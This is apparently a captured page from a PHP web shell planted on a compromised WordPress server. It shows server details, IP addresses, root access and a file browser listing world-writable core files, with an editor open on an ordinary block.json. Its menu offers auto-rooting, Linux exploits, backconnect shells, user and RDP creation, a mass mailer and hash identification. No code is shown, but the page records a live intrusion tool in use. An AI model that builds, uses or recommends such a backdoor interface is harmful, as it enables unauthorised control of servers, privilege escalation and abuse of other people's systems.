Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
inselect /
wp-includes /
blocks /
audio /
[ HOME SHELL ]
Name
Size
Permission
Action
block.json
1.14
KB
-rwxrwxrwx
editor-rtl.css
250
B
-rwxrwxrwx
editor-rtl.min.css
215
B
-rwxrwxrwx
editor.css
248
B
-rwxrwxrwx
editor.min.css
213
B
-rwxrwxrwx
style-rtl.css
171
B
-rwxrwxrwx
style-rtl.min.css
148
B
-rwxrwxrwx
style.css
171
B
-rwxrwxrwx
style.min.css
148
B
-rwxrwxrwx
theme-rtl.css
194
B
-rwxrwxrwx
theme-rtl.min.css
170
B
-rwxrwxrwx
theme.css
194
B
-rwxrwxrwx
theme.min.css
170
B
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : block.json
{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 2, "name": "core/audio", "title": "Audio", "category": "media", "description": "Embed a simple audio player.", "keywords": [ "music", "sound", "podcast", "recording" ], "textdomain": "default", "attributes": { "src": { "type": "string", "source": "attribute", "selector": "audio", "attribute": "src", "__experimentalRole": "content" }, "caption": { "type": "string", "source": "html", "selector": "figcaption", "__experimentalRole": "content" }, "id": { "type": "number", "__experimentalRole": "content" }, "autoplay": { "type": "boolean", "source": "attribute", "selector": "audio", "attribute": "autoplay" }, "loop": { "type": "boolean", "source": "attribute", "selector": "audio", "attribute": "loop" }, "preload": { "type": "string", "source": "attribute", "selector": "audio", "attribute": "preload" } }, "supports": { "anchor": true, "align": true, "spacing": { "margin": true, "padding": true } }, "editorStyle": "wp-block-audio-editor", "style": "wp-block-audio" }
Close